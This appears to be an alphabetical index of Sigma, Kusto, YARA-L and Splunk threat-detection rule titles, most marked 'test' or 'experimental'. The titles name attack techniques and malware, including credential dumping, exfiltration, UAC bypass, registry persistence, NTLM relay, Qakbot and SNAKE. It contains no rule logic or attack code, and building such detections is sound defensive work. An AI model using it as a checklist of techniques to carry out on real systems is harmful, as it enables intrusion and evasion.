- Sigma Potential Goofy Guineapig Backdoor Activity test
- Sigma Potential Goofy Guineapig GoolgeUpdate Process Anomaly test
- Sigma Potential KamiKakaBot Activity - Shutdown Schedule Task Creation test
- Sigma Potential Kapeka Decrypted Backdoor Indicator test
- Kusto Potential Kerberos Relaying Activity - MDE
- Kusto Potential Lateral Movement via MSI ODBC Driver Install over DCOM
- Sigma Potential Malicious AppX Package Installation Attempts test
- Sigma Potential Memory Dumping Activity Via LiveKD test
- Sigma Potential MuddyWater APT Activity test
- Kusto Potential NTLM Relay Attack to Domain Controller
- Sigma Potential Persistence Attempt Via ErrorHandler.Cmd test
- Sigma Potential Persistence Via AutodialDLL test
- Sigma Potential Persistence Via CHM Helper DLL test
- Sigma Potential Persistence Via Disk Cleanup Handler - Registry test
- Sigma Potential Persistence Via DLLPathOverride test
- Sigma Potential Persistence Via LSA Extensions test
- Sigma Potential Persistence Via Mpnotify test
- Sigma Potential Persistence Via MyComputer Registry Keys test
- Sigma Potential Persistence Via New AMSI Providers - Registry test
- Sigma Potential Persistence Via Notepad++ Plugins test
- Sigma Potential Persistence Via Security Descriptors - ScriptBlock test
- Sigma Potential Persistence Via TypedPaths test
- Sigma Potential PowerShell Execution Policy Tampering test
- Sigma Potential PowerShell Execution Policy Tampering - ProcCreation test
- Sigma Potential Privilege Escalation Attempt Via .Exe.Local Technique test
- Sigma Potential Qakbot Rundll32 Execution test
- Sigma Potential Raspberry Robin Dot Ending File test
- Sigma Potential RDP Session Hijacking Activity test
- Sigma Potential Recon Activity Using DriverQuery.EXE test
- Sigma Potential Renamed Rundll32 Execution test
- Sigma Potential SentinelOne Shell Context Menu Scan Command Tampering test
- Sigma Potential ShellDispatch.DLL Functionality Abuse test
- Sigma Potential Signing Bypass Via Windows Developer Features test
- Sigma Potential Signing Bypass Via Windows Developer Features - Registry test
- Sigma Potential SNAKE Malware Installation Binary Indicator test
- Sigma Potential SNAKE Malware Installation CLI Arguments Indicator test
- Sigma Potential SNAKE Malware Persistence Service Execution test
- Sigma Potential Suspicious PowerShell Module File Created test
- Sigma Potential Suspicious Windows Feature Enabled test
- Sigma Potential Suspicious Windows Feature Enabled - ProcCreation test
- Sigma Potential Suspicious Winget Package Installation test
- Kusto Potentially Relayed NTLM Authentication - Microsoft Defender for Endpoint
- Kusto Potentially Relayed NTLM Authentication - Microsoft Sentinel
- Kusto Potentially Relayed NTLM Authentication - Microsoft Sentinel
- Sigma Potentially Suspicious Call To Win32_NTEventlogFile Class test
- Sigma Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript test
- Sigma Potentially Suspicious Child Process Of ClickOnce Application test
- Sigma Potentially Suspicious DMP/HDMP File Creation test
- Sigma Potentially Suspicious Electron Application CommandLine test
- Sigma Potentially Suspicious Execution Of PDQDeployRunner test
- Sigma Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE test
- Sigma Potentially Suspicious File Download From ZIP TLD test
- Sigma Potentially Suspicious GoogleUpdate Child Process test
- Sigma Potentially Suspicious WDAC Policy File Creation experimental
- Sigma Potentially Suspicious Windows App Activity test
- Sigma PowerShell Core DLL Loaded Via Office Application test
- Sigma PowerShell Execution With Potential Decryption Capabilities test
- Sigma PowerShell Hotfix Enumeration test
- Sigma PowerShell Module File Created test
- Sigma PowerShell Module File Created By Non-PowerShell Process test
- Sigma PowerShell Script Change Permission Via Set-Acl test
- Sigma PowerShell Script Dropped Via PowerShell.EXE test
- Sigma PowerShell Script Execution Policy Enabled test
- Sigma PowerShell Set-Acl On Windows Folder test
- Sigma PowerShell Write-EventLog Usage test
- Sigma Process Deletion of Its Own Executable test
- Sigma Process Launched Without Image Name test
- Kusto Process Tree Analysis
- Sigma PsExec Service Child Process Execution as LOCAL SYSTEM test
- Sigma PsExec Service Execution test
- Sigma PSScriptPolicyTest Creation By Uncommon Process test
- Sigma Publisher Attachment File Dropped In Suspicious Location test
- Sigma Qakbot Regsvr32 Calc Pattern test
- Sigma Qakbot Rundll32 Exports Execution test
- Sigma Qakbot Rundll32 Fake DLL Extension Execution test
- Sigma Qakbot Uninstaller Execution test
- Sigma Query Usage To Exfil Data test
- Sigma Rebuild Performance Counter Values Via Lodctr.EXE test
- YARA-L Recon Suspicious Commands CISA Report
- Sigma Register New IFiltre For Persistence test
- Sigma Remote Access Tool - Ammy Admin Agent Execution test
- Sigma Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate test
- Sigma Remote Access Tool - Cmd.EXE Execution via AnyViewer test
- Sigma Remote Access Tool - NetSupport Execution From Unusual Location test
- Sigma Remote Access Tool - RURAT Execution From Unusual Location test
- Sigma Remote Access Tool - ScreenConnect Remote Command Execution - Hunting test
- Sigma Remote AppX Package Downloaded from File Sharing or CDN Domain test
- Sigma Remote Thread Creation In Mstsc.Exe From Suspicious Location test
- Sigma Remote Utilities Host Service Install test
- Sigma Renamed AutoHotkey.EXE Execution test
- Sigma Renamed Microsoft Teams Execution test
- Sigma Renamed NetSupport RAT Execution test
- Sigma Renamed PsExec Service Execution test
- Sigma Renamed Remote Utilities RAT (RURAT) Execution test
- Sigma Renamed VsCode Code Tunnel Execution - File Indicator test
- Kusto RITA Beacon Analyzer for Windows Firewall Events
- Sigma RTCore Suspicious Service Installation test
- Sigma Rundll32 Spawned Via Explorer.EXE test
- Kusto Scheduled Task - Suspicious Network Connection
- Sigma Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor test
- Sigma Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler test
- Sigma ScreenConnect - SlashAndGrab Exploitation Indicators test
- Sigma ScreenConnect User Database Modification test
- Sigma ScreenConnect User Database Modification - Security test
- Kusto Server Network Connection Anomalies
- Sigma Shell Context Menu Command Tampering test
- Sigma Shell Process Spawned by Java.EXE test
- Sigma Small Sieve Malware Registry Persistence test
- Sigma SNAKE Malware Covert Store Registry Key test
- Sigma SNAKE Malware Installer Name Indicators test
- Sigma SNAKE Malware Kernel Driver File Indicator test
- Sigma SNAKE Malware Service Persistence test
- Sigma SNAKE Malware WerFault Persistence File Creation test
- Kusto Spearphishing Attachment: ISO Images (Microsoft Defender for Endpoint)
- Kusto Spearphishing Attachment: ISO Images (Microsoft Sentinel)
- Splunk Spike in File Writes experimental
- Sigma Standard User In High Privileged Group test
- Sigma Start of NT Virtual DOS Machine test
- Kusto SUNBURST suspicious SolarWinds child processes
- Sigma Suspicious Advpack Call Via Rundll32.EXE test
- Sigma Suspicious Application Installed test
- Sigma Suspicious Child Process Of Veeam Dabatase test
- Sigma Suspicious Digital Signature Of AppX Package test
- Kusto Suspicious Driver Load
- Sigma Suspicious Electron Application Child Processes test
- Sigma Suspicious Environment Variable Has Been Registered test
- Sigma Suspicious Execution Location Of Wermgr.EXE test
- Sigma Suspicious Execution of InstallUtil Without Log test
- Sigma Suspicious File Created Via OneNote Application test
- Sigma Suspicious File Creation Activity From Fake Recycle.Bin Folder test
- Sigma Suspicious File Creation In Uncommon AppData Folder test
- Sigma Suspicious File Download From File Sharing Domain Via Curl.EXE test
- Sigma Suspicious File Download From File Sharing Domain Via Wget.EXE test
- Sigma Suspicious File Download From IP Via Curl.EXE test
- Sigma Suspicious File Download From IP Via Wget.EXE test
- Sigma Suspicious File Download From IP Via Wget.EXE - Paths test
- Sigma Suspicious IIS URL GlobalRules Rewrite Via AppCmd test
- Sigma Suspicious Msbuild Execution By Uncommon Parent Process test
- Kusto Suspicious Network Beacons - Microsoft Defender for Endpoint Aggregated Reports
- Kusto Suspicious Network Beacons - Microsoft Defender(MDE/M365D)
- Kusto Suspicious Network Beacons - Sysmon
- Sigma Suspicious Network Connection Binary No CommandLine test
- Kusto Suspicious Network Connections - Supply Chain Attack
- Sigma Suspicious New Instance Of An Office COM Object test
- Sigma Suspicious Obfuscated PowerShell Code test
- Sigma Suspicious Powercfg Execution To Change Lock Screen Timeout test
- Sigma Suspicious PowerShell Invocations - Specific - ProcessCreation test
- Sigma Suspicious PowerShell Mailbox Export to Share test
- Sigma Suspicious PowerShell Mailbox Export to Share - PS test
- Sigma Suspicious Process Execution From Fake Recycle.Bin Folder test
- Sigma Suspicious Processes Spawned by Java.EXE test
- Sigma Suspicious RunAs-Like Flag Combination test
- Sigma Suspicious Shells Spawn by Java Utility Keytool test
- Kusto Suspicious TGT Request with a DC Account
- YARA-L Suspicious Unusual Location LNK File
- Sigma Suspicious Usage Of ShellExec_RunDLL test
- Sigma Suspicious WindowsTerminal Child Processes test
- Sigma Suspicious Wordpad Outbound Connections test
- Sigma Suspicious Workstation Locking via Rundll32 test
- Sigma Sysinternals Tools AppX Versions Execution test
- Sigma Sysmon Blocked Executable test
- Sigma Sysmon Blocked File Shredding test
- Sigma Sysmon Configuration Change test
- Sigma Sysmon File Executable Creation Detected test
- Sigma UAC Bypass Using Event Viewer RecentViews test
- Sigma UAC Bypass Using EventVwr test
- Sigma UNC4841 - Barracuda ESG Exploitation Indicators test
- Sigma UNC4841 - Email Exfiltration File Pattern test
- Sigma UNC4841 - Potential SEASPY Execution test
- Sigma Uncommon Child Processes Of SndVol.exe test
- Sigma Uncommon File Creation By Mysql Daemon Process test
- Sigma Uncommon FileSystem Load Attempt By Format.com test
- Sigma Unsigned AppX Installation Attempt Using Add-AppxPackage test
- Sigma Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript test
- Splunk Unusually Long Command Line experimental
- Sigma Veeam Backup Servers Credential Dumping Script Execution test
- Sigma Visual Studio Code Tunnel Remote File Creation test
- Sigma VsCode Code Tunnel Execution File Indicator test
- Sigma Wab Execution From Non Default Location test
- Sigma Wab/Wabmig Unusual Parent Or Child Processes test
- Sigma Weak or Abused Passwords In CLI test
- Sigma Windows Defender Malware Detection History Deletion test
- Sigma Windows Kernel Debugger Execution test
- Sigma Windows Service Terminated With Error test
- YARA-L Windows Short Term Account Use
- Sigma Winget Admin Settings Modification test
- Sigma WinSxS Executable File Creation By Non-System Process test
- Sigma Wusa.EXE Executed By Parent Process Located In Suspicious Location test